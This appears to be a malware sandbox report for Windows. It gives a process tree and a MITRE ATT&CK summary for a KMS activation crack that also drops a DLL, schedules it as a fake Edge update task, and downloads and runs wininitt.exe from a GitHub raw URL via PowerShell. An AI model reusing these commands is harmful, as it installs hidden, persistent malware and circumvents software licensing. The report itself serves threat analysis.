    C:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL" get GracePeriodRemaining /value 2>nul
    - System Location Discovery: System Language Discovery
    [depth 4] PID:5532  C:\Windows\system32\Wbem\WMIC.exe
        wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL" get GracePeriodRemaining /value
[depth 3] PID:5668  C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingService get Version /value
    - System Location Discovery: System Language Discovery
    [depth 4] PID:5880  C:\Windows\system32\Wbem\WMIC.exe
        wmic path SoftwareLicensingService get Version /value
[depth 3] PID:6140  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /t REG_SZ /d "172.16.0.2"
[depth 3] PID:2792  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /t REG_SZ /d "1688"
[depth 3] PID:6032  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /t REG_SZ /d "172.16.0.2" /reg:32
[depth 3] PID:5936  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /t REG_SZ /d "1688" /reg:32
[depth 3] PID:5892  C:\Windows\system32\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /reg:32
[depth 3] PID:5828  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /v KeyManagementServiceName /t REG_SZ /d "172.16.0.2" /reg:32
[depth 3] PID:5840  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /v KeyManagementServicePort /t REG_SZ /d "1688" /reg:32
[depth 3] PID:5868  C:\Windows\system32\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f
[depth 3] PID:5816  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /v KeyManagementServiceName /t REG_SZ /d "172.16.0.2"
[depth 3] PID:5920  C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /v KeyManagementServicePort /t REG_SZ /d "1688"
[depth 3] PID:5792  C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' " get ID /value
    - System Location Discovery: System Language Discovery
    [depth 4] PID:5832  C:\Windows\system32\Wbem\WMIC.exe
        wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' " get ID /value
[depth 3] PID:5960  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "ID='2de67392-b7a7-462a-b1ca-108dd189f588'" get LicenseStatus /value
[depth 3] PID:6104  C:\Windows\system32\findstr.exe
    findstr "1"
[depth 3] PID:5156  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value
[depth 3] PID:5740  C:\Windows\system32\findstr.exe
    findstr /i "2de67392-b7a7-462a-b1ca-108dd189f588"
[depth 3] PID:5976  C:\Windows\system32\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588" /f
[depth 3] PID:6040  C:\Windows\system32\reg.exe
    reg delete "HKU\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedSystemState" /f
    - Modifies data under HKEY_USERS
[depth 3] PID:6060  C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ID='2de67392-b7a7-462a-b1ca-108dd189f588'" get Name /value
    - System Location Discovery: System Language Discovery
    [depth 4] PID:5172  C:\Windows\system32\Wbem\WMIC.exe
        wmic path SoftwareLicensingProduct where "ID='2de67392-b7a7-462a-b1ca-108dd189f588'" get Name /value
[depth 3] PID:5212  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where ID='2de67392-b7a7-462a-b1ca-108dd189f588' call Activate
[depth 3] PID:3716  C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ID='2de67392-b7a7-462a-b1ca-108dd189f588'" get GracePeriodRemaining /value
    - System Location Discovery: System Language Discovery
    [depth 4] PID:5148  C:\Windows\system32\Wbem\WMIC.exe
        wmic path SoftwareLicensingProduct where "ID='2de67392-b7a7-462a-b1ca-108dd189f588'" get GracePeriodRemaining /value
[depth 3] PID:4044  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "ID='3f1afc82-f8ac-4f6c-8005-1d233e606eee'" get LicenseStatus /value
[depth 3] PID:3156  C:\Windows\system32\findstr.exe
    findstr "1"
[depth 3] PID:5276  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value
[depth 3] PID:5304  C:\Windows\system32\findstr.exe
    findstr /i "3f1afc82-f8ac-4f6c-8005-1d233e606eee"
[depth 3] PID:5260  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "ID='73111121-5638-40f6-bc11-f1d7b0d64300'" get LicenseStatus /value
[depth 3] PID:5560  C:\Windows\system32\findstr.exe
    findstr "1"
[depth 3] PID:5620  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value
[depth 3] PID:1728  C:\Windows\system32\findstr.exe
    findstr /i "73111121-5638-40f6-bc11-f1d7b0d64300"
[depth 3] PID:1344  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "ID='82bbc092-bc50-4e16-8e18-b74fc486aec3'" get LicenseStatus /value
[depth 3] PID:876  C:\Windows\system32\findstr.exe
    findstr "1"
[depth 3] PID:5308  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value
[depth 3] PID:8  C:\Windows\system32\findstr.exe
    findstr /i "82bbc092-bc50-4e16-8e18-b74fc486aec3"
[depth 3] PID:5064  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "ID='e0c42288-980c-4788-a014-c080d2e1926e'" get LicenseStatus /value
[depth 3] PID:5492  C:\Windows\system32\findstr.exe
    findstr "1"
[depth 3] PID:4808  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value
[depth 3] PID:2464  C:\Windows\system32\findstr.exe
    findstr /i "e0c42288-980c-4788-a014-c080d2e1926e"
[depth 3] PID:5484  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "ID='e4db50ea-bda1-4566-b047-0ca50abc6f07'" get LicenseStatus /value
[depth 3] PID:5476  C:\Windows\system32\findstr.exe
    findstr "1"
[depth 3] PID:5552  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value
[depth 3] PID:5580  C:\Windows\system32\findstr.exe
    findstr /i "e4db50ea-bda1-4566-b047-0ca50abc6f07"
[depth 3] PID:5588  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "ID='ec868e65-fadf-4759-b23e-93fe37f2cc29'" get LicenseStatus /value
[depth 3] PID:5600  C:\Windows\system32\findstr.exe
    findstr "1"
[depth 3] PID:3128  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value
[depth 3] PID:5188  C:\Windows\system32\findstr.exe
    findstr /i "ec868e65-fadf-4759-b23e-93fe37f2cc29"
[depth 3] PID:5128  C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' and Description like '%KMSCLIENT%'" get ID /value
    - System Location Discovery: System Language Discovery
    [depth 4] PID:1000  C:\Windows\system32\Wbem\WMIC.exe
        wmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' and Description like '%KMSCLIENT%'" get ID /value
[depth 3] PID:5688  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "ID='0bc88885-718c-491d-921f-6f214349e79c'" get Name /value
[depth 3] PID:920  C:\Windows\system32\find.exe
    find /i "Office 14" "C:\Windows\Temp\sppchk.txt"
[depth 3] PID:1068  C:\Windows\system32\find.exe
    find /i "Office 15" "C:\Windows\Temp\sppchk.txt"
[depth 3] PID:4040  C:\Windows\system32\find.exe
    find /i "Office 16" "C:\Windows\Temp\sppchk.txt"
[depth 3] PID:3048  C:\Windows\system32\find.exe
    find /i "Office 19" "C:\Windows\Temp\sppchk.txt"
[depth 3] PID:5428  C:\Windows\system32\find.exe
    find /i "Office 21" "C:\Windows\Temp\sppchk.txt"
[depth 3] PID:4072  C:\Windows\system32\find.exe
    find /i "Office 24" "C:\Windows\Temp\sppchk.txt"
[depth 3] PID:4564  C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ID='0bc88885-718c-491d-921f-6f214349e79c'" get Name /value
    - System Location Discovery: System Language Discovery
    [depth 4] PID:5756  C:\Windows\system32\Wbem\WMIC.exe
        wmic path SoftwareLicensingProduct where "ID='0bc88885-718c-491d-921f-6f214349e79c'" get Name /value
[depth 3] PID:5872  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value
[depth 3] PID:5636  C:\Windows\system32\findstr.exe
    findstr /i "0bc88885-718c-491d-921f-6f214349e79c"
[depth 3] PID:5912  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "ID='85dd8b5f-eaa4-4af3-a628-cce9e77c9a03'" get Name /value
[depth 3] PID:5844  C:\Windows\system32\find.exe
    find /i "Office 14" "C:\Windows\Temp\sppchk.txt"
[depth 3] PID:5908  C:\Windows\system32\find.exe
    find /i "Office 15" "C:\Windows\Temp\sppchk.txt"
[depth 3] PID:5796  C:\Windows\system32\find.exe
    find /i "Office 16" "C:\Windows\Temp\sppchk.txt"
[depth 3] PID:5868  C:\Windows\system32\find.exe
    find /i "Office 19" "C:\Windows\Temp\sppchk.txt"
[depth 3] PID:5916  C:\Windows\system32\find.exe
    find /i "Office 21" "C:\Windows\Temp\sppchk.txt"
[depth 3] PID:6084  C:\Windows\system32\find.exe
    find /i "Office 24" "C:\Windows\Temp\sppchk.txt"
[depth 3] PID:6100  C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ID='85dd8b5f-eaa4-4af3-a628-cce9e77c9a03'" get Name /value
    - System Location Discovery: System Language Discovery
    [depth 4] PID:5832  C:\Windows\system32\Wbem\WMIC.exe
        wmic path SoftwareLicensingProduct where "ID='85dd8b5f-eaa4-4af3-a628-cce9e77c9a03'" get Name /value
[depth 3] PID:5928  C:\Windows\system32\Wbem\WMIC.exe
    wmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value
[depth 3] PID:6112  C:\Windows\system32\findstr.exe
    findstr /i "85dd8b5f-eaa4-4af3-a628-cce9e77c9a03"
[depth 3] PID:6068  C:\Windows\system32\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663\85dd8b5f-eaa4-4af3-a628-cce9e77c9a03" /f
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Office\16.0\Common\OEM" /f3⤵PID:5156
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Office\16.0\Common\OEM" /f /reg:323⤵PID:5196
-
-
C:\Windows\system32\reg.exereg delete "HKU\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedSystemState" /f3⤵PID:6036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ID='85dd8b5f-eaa4-4af3-a628-cce9e77c9a03'" get Name /value3⤵
- System Location Discovery: System Language Discovery
PID:6040 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='85dd8b5f-eaa4-4af3-a628-cce9e77c9a03'" get Name /value4⤵PID:5144
-
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where ID='85dd8b5f-eaa4-4af3-a628-cce9e77c9a03' call Activate3⤵PID:6060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ID='85dd8b5f-eaa4-4af3-a628-cce9e77c9a03'" get GracePeriodRemaining /value3⤵
- System Location Discovery: System Language Discovery
PID:5212 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='85dd8b5f-eaa4-4af3-a628-cce9e77c9a03'" get GracePeriodRemaining /value4⤵PID:1940
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Windows\System32\vcruntime143_thread.dll,Start1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in Windows directory
PID:6004 -
C:\Windows\system32\schtasks.exeschtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachineCoreUO" /tr "rundll32.exe C:\Windows\System32\vcruntime143_thread.dll,Start"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5168
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\temp_script.bat2⤵PID:2888
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/zoneprohuub/WOC/main/VAN' -OutFile 'C:\Windows\Help\service\wininitt.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:4276
-
-
-
C:\Windows\Help\service\wininitt.exeC:\Windows\Help\service\wininitt.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5684
-
Network
MITRE ATT&CK Enterprise v15 (tactic > technique > sub-technique, with TTP counts)

Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
  System Services (1)
    Service Execution (1)

Persistence
  Create or Modify System Process (2)
    Windows Service (2)
  Event Triggered Execution (2)
    Image File Execution Options Injection (1)
    Netsh Helper DLL (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)

Privilege Escalation
  Create or Modify System Process (2)
    Windows Service (2)
  Event Triggered Execution (2)
    Image File Execution Options Injection (1)
    Netsh Helper DLL (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)

Defense Evasion
  Impair Defenses (2)
    Disable or Modify System Firewall (1)
  Modify Registry (1)
Downloads